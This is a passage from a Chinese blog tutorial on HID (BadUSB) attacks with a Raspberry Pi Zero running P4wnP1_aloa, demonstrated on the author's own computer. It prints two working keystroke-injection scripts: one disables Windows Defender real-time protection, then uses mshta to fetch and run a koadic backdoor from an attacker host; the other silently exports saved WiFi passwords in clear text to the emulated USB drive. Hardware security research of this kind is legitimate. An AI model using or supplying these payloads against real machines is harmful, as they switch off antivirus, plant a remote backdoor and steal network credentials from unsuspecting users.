<p>设备：目标机器（IP：192.168.1.108，本机）、攻击机器（IP：192.168.1.109，桥接模式联网的虚拟机）、P4wnP1_aloa(本机登陆web端进行控制)<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack0.png" alt="image"></p>
<p>先在攻击机器上配置koadic<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack1.png" alt="image"></p>
<p>在P4wnP1_aloa中写好脚本<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack5.png" alt="image"><br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">layout(<span class="string">'us'</span>);</span><br><span class="line">typingSpeed(<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">waitLEDRepeat(NUM);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">type(<span class="string">"powershell start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs\n"</span>);</span><br><span class="line">delay(<span class="number">2000</span>);</span><br><span class="line">press(<span class="string">"ALT Y"</span>);</span><br><span class="line">delay(<span class="number">5000</span>);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">type(<span class="string">"mshta http://192.168.1.109:9999/lyrCZ\n"</span>);</span><br></pre></td></tr></table></figure></p>
<p>这段脚本会先关闭Win10的Defender，再获取后门程序并执行。连续快按num lock键触发操作。</p>
<p>攻击机器得到回显<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack2.png" alt="image"></p>
<p>由于是笔者日常使用的电脑，不做太多攻击测试<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack4.png" alt="image"></p>
<p><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack3.png" alt="image"></p>
<h3 id="场景2"><a href="#场景2" class="headerlink" title="场景2"></a>场景2</h3><p>获取电脑保存的WiFi密码</p>
<p>开启Mass Storage模拟，选择默认的test.bin镜像，不要忘了点击左上角deploy进行部署。<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack8.png" alt="image"></p>
<p>使用HIDScript，这段脚本是对BashBunny的payload WiPassDump进行改写得到的<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack7.png" alt="image"><br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">layout(<span class="string">'us'</span>);</span><br><span class="line">typingSpeed(<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">waitLEDRepeat(NUM);</span><br><span class="line">press(<span class="string">"GUI R"</span>);</span><br><span class="line">delay(<span class="number">500</span>);</span><br><span class="line">type(<span class="string">"powershell -WindowStyle Hidden $bunny=(gwmi win32_volume -f 'label=\\\"README\\\"').NAME; cd $bunny; netsh wlan export profile key=clear\n"</span>);</span><br></pre></td></tr></table></figure></p>
<p>USB连接目标电脑，电脑将P4wnP1_aloa识别为U盘，连续快按num lock键触发操作。<br>可以看到U盘里保存了电脑存储的WiFi密码。<br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack6.png" alt="image"><br><img src="https://github.com/Houwenda/houwenda.github.io/raw/master/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/pics/attack9.png" alt="image"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><blockquote>
<p>P4wnP1_aloa相比于P4wnP1，在可玩性上有很大提升，可以实现更多更复杂的攻击，当然，对一些简单高效的攻击来说使用原版P4wnP1可以减少操作步骤。P4wnP1_aloa由树莓派zero w搭载，成本比99美刀的BashBunny低很多（跟teensy等badusb比就没意思了，毕竟功能摆在这）。中文输入法对HID攻击干扰较大，尚且没找到好的解决方案。</p>
</blockquote>
<blockquote>
<p>参考链接：<br><a href="http://shumeipai.nxez.com/2018/06/26/using-raspberry-pi-zero-to-implement-new-bad-usb-with-echo.html" target="_blank" rel="noopener">http://shumeipai.nxez.com/2018/06/26/using-raspberry-pi-zero-to-implement-new-bad-usb-with-echo.html</a></p>
</blockquote>

      
      
        <div class="page-reward">
          <p><a href="javascript:void(0)" onclick="dashangToggle()" class="dashang">赏</a></p>
          <div class="hide_box"></div>
          <div class="shang_box">
            <a class="shang_close" href="javascript:void(0)" onclick="dashangToggle()">×</a>
            <div class="shang_tit">
              <p>纯属好玩</p>
            </div>
            <div class="shang_payimg">
              <img src="/img/alipayimg.jpg" alt="扫码支持" title="扫一扫">
            </div>
              <div class="pay_explain">扫码打赏，你说多少就多少</div>
            <div class="shang_payselect">
              
                <div class="pay_item checked" data-id="alipay">
                  <span class="radiobox"></span>
                  <span class="pay_logo"><img src="/img/alipay.png" alt="支付宝"></span>
                </div>
              
              
                <div class="pay_item" data-id="wechat">
                  <span class="radiobox"></span>
                  <span class="pay_logo"><img src="/img/weixin.png" alt="微信"></span>
                </div>
              
            </div>
            <div class="shang_info">
              <p>打开<span id="shang_pay_txt">支付宝</span>扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
        </div>
        <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/zepto/1.2.0/zepto.min.js"></script>
        <script type="text/javascript">
          $(".pay_item").click(function(){
            $(this).addClass('checked').siblings('.pay_item').removeClass('checked');
            var dataid=$(this).attr('data-id');
            $(".shang_payimg img").attr("src","/img/"+dataid+"img.jpg");
            $("#shang_pay_txt").text(dataid=="alipay"?"支付宝":"微信");
          });
          function dashangToggle(){
            
            $(".hide_box").fadeToggle();
            $(".shang_box").fadeToggle();
          }
        </script>
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/">如何用P4wnP1_aloa进行HID攻击</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 漏断 的个人博客">漏断</a></p>
        <p><span>发布时间:</span>2019年01月22日 - 08时45分</p>
        <p><span>最后更新:</span>2019年04月22日 - 22时55分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/" title="如何用P4wnP1_aloa进行HID攻击">http://houwenda.github.io/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/</a>
            <span class="copy-path" data-clipboard-text="原文: http://houwenda.github.io/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/　　作者: 漏断" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2019/03/03/hello-world/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          Hello World
        
      </div>
    </a>
  
  
    <a href="/2019/01/21/shell-script-notes/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">ShellScript笔记</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#安装"><span class="toc-number">2.</span> <span class="toc-text">安装</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#使用"><span class="toc-number">3.</span> <span class="toc-text">使用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web端"><span class="toc-number">3.1.</span> <span class="toc-text">web端</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#HIDScript"><span class="toc-number">3.1.0.1.</span> <span class="toc-text">HIDScript</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Trigger-Action"><span class="toc-number">3.1.0.2.</span> <span class="toc-text">Trigger Action</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#USB-Settings"><span class="toc-number">3.1.0.3.</span> <span class="toc-text">USB Settings</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#WIFI-Settings"><span class="toc-number">3.1.0.4.</span> <span class="toc-text">WIFI Settings</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Bluetooth-Settings"><span class="toc-number">3.1.0.5.</span> <span class="toc-text">Bluetooth Settings</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Network-Settings"><span class="toc-number">3.1.0.6.</span> <span class="toc-text">Network Settings</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Event-Log"><span class="toc-number">3.1.0.7.</span> <span class="toc-text">Event Log</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Generic-Settings"><span class="toc-number">3.1.0.8.</span> <span class="toc-text">Generic Settings</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssh端"><span class="toc-number">3.2.</span> <span class="toc-text">ssh端</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#存储位置"><span class="toc-number">3.2.0.1.</span> <span class="toc-text">存储位置</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#P4wnP1-cli"><span class="toc-number">3.2.0.2.</span> <span class="toc-text">P4wnP1_cli</span></a></li></ol></li></ol><li class="toc-item toc-level-2"><a class="toc-link" href="#原理"><span class="toc-number">4.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#实战"><span class="toc-number">5.</span> <span class="toc-text">实战</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#场景1"><span class="toc-number">5.1.</span> <span class="toc-text">场景1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#场景2"><span class="toc-number">5.2.</span> <span class="toc-text">场景2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">6.</span> <span class="toc-text">总结</span></a></li>
</div>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>






    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/03/03/hello-world/" title="上一篇: Hello World">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2019/01/21/shell-script-notes/" title="下一篇: ShellScript笔记">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/04/22/NUSTCTF2019-notes-of-creating-challenges/">NUSTCTF2019出题笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/22/nustctf2019-web-writeup/">NUSTCTF2019 Web题解（部分）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/10/python-basics/">Python基础</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/hello-world/">Hello World</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/22/hid-attack-with-P4wnP1-a-l-o-a/">如何用P4wnP1_aloa进行HID攻击</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/21/shell-script-notes/">ShellScript笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/19/bash-commands-notes/">Bash笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/how-to-import-mkv-into-Adobe-Premiere/">如何将mkv视频导入Adobe Premiere</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/08/08/shell-made-of-symbols/">纯符号shell的学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/20/nust-ctf-e5-b8-88-e5-82-85-e4-bb-ac-e7-9a-84blogs/">师傅们的blogs</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/06/php-e6-96-87-e4-bb-b6-e5-92-8c-e7-9b-ae-e5-bd-95-e7-ac-94-e8-ae-b0-e8-a1-a5-e5-85-85/">PHP文件和目录 笔记补充</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/04/how-to-install-sqli-labs-on-windows-10/">How to install sqli-labs on Windows 10</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/02/xamppdvwa-on-windows-10-installation-guide/">XAMPP+DVWA on Windows 10 installation guide</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/29/vmware-workstation-pro12kali2017-3-e5-ae-89-e8-a3-85-e8-ae-b0-e5-bd-95/">VMware Workstation Pro12+Kali2017.3安装记录</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/29/regex-notes/">正则补充</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/28/php-e7-ac-94-e8-ae-b0/">PHP笔记</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 漏断
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">总浏览量: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 3;
            var backgroundimg = "url(/background/bg-" + backgroundnum +".jpg)";
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>